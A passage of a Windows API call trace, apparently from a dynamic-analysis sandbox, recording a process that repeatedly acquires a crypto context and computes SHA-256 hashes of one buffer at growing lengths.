	[0199.728] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.728] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0199.728] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.728] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691b90
	[0199.728] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691b90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691b90, pdwDataLen=0x1283b0) returned 1
	[0199.728] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.728] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.728] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.728] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.728] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0199.728] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.728] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691bb8
	[0199.728] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691bb8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691bb8, pdwDataLen=0x1283b0) returned 1
	[0199.728] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.728] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.728] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.729] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.729] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0199.729] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.729] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691be0
	[0199.729] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691be0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691be0, pdwDataLen=0x1283b0) returned 1
	[0199.729] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.729] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.729] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.729] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.729] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0199.729] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.729] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691c08
	[0199.729] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691c08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691c08, pdwDataLen=0x1283b0) returned 1
	[0199.729] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.729] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.729] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.730] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.730] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0199.730] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.730] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691c30
	[0199.730] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691c30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691c30, pdwDataLen=0x1283b0) returned 1
	[0199.730] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.730] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.730] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.730] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.730] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0199.730] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.730] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691c58
	[0199.730] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691c58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691c58, pdwDataLen=0x1283b0) returned 1
	[0199.730] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.730] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.730] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.731] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.731] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0199.731] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.731] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691c80
	[0199.731] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691c80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691c80, pdwDataLen=0x1283b0) returned 1
	[0199.731] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.731] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.731] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.731] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.731] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0199.731] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.731] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691ca8
	[0199.731] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691ca8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691ca8, pdwDataLen=0x1283b0) returned 1
	[0199.731] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.731] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.731] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.732] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.732] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0199.732] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.732] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691cd0
	[0199.732] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691cd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691cd0, pdwDataLen=0x1283b0) returned 1
	[0199.732] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.732] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.732] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.732] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.732] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0199.732] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.732] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691cf8
	[0199.732] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691cf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691cf8, pdwDataLen=0x1283b0) returned 1
	[0199.732] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.732] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.732] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.733] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.733] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0199.733] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.733] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691d20
	[0199.733] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691d20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691d20, pdwDataLen=0x1283b0) returned 1
	[0199.733] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.733] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.733] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.733] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.733] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0199.733] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.733] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691d48
	[0199.733] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691d48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691d48, pdwDataLen=0x1283b0) returned 1
	[0199.733] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.733] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.733] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.734] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.734] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0199.734] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.734] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691d70
	[0199.734] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691d70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691d70, pdwDataLen=0x1283b0) returned 1
	[0199.734] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.734] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.734] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.734] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.734] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0199.734] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.734] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691d98
	[0199.734] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691d98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691d98, pdwDataLen=0x1283b0) returned 1
	[0199.734] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.734] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.734] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.735] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.735] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0199.735] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.735] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691dc0
	[0199.735] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691dc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691dc0, pdwDataLen=0x1283b0) returned 1
	[0199.735] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.735] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.735] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.735] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.735] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0199.735] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.735] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691de8
	[0199.735] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691de8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691de8, pdwDataLen=0x1283b0) returned 1
	[0199.735] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.735] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.735] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.736] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.736] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0199.736] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.736] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691e10
	[0199.736] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691e10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691e10, pdwDataLen=0x1283b0) returned 1
	[0199.736] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.736] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.736] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.736] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.736] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0199.736] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.736] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691e38
	[0199.736] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691e38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691e38, pdwDataLen=0x1283b0) returned 1
	[0199.736] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.736] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.736] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.736] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.736] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0199.737] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.737] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691e60
	[0199.737] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691e60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691e60, pdwDataLen=0x1283b0) returned 1
	[0199.737] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.737] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.737] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.737] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.737] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0199.737] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.737] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691e88
	[0199.737] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691e88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691e88, pdwDataLen=0x1283b0) returned 1
	[0199.737] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.737] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.737] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.738] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.738] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0199.738] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.738] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691eb0
	[0199.738] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691eb0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691eb0, pdwDataLen=0x1283b0) returned 1
	[0199.738] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.738] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.738] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.738] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.738] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0199.738] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.738] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691ed8
	[0199.738] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691ed8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691ed8, pdwDataLen=0x1283b0) returned 1
	[0199.738] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.738] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.738] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.739] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.739] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0199.739] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.739] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691f00
	[0199.739] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691f00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691f00, pdwDataLen=0x1283b0) returned 1
	[0199.739] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.739] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.739] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.739] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.739] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0199.739] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.739] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691f28
	[0199.739] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691f28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691f28, pdwDataLen=0x1283b0) returned 1
	[0199.739] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.739] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.739] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.740] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.740] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0199.740] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.740] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691f50
	[0199.740] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691f50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691f50, pdwDataLen=0x1283b0) returned 1
	[0199.740] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.740] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.740] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.740] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
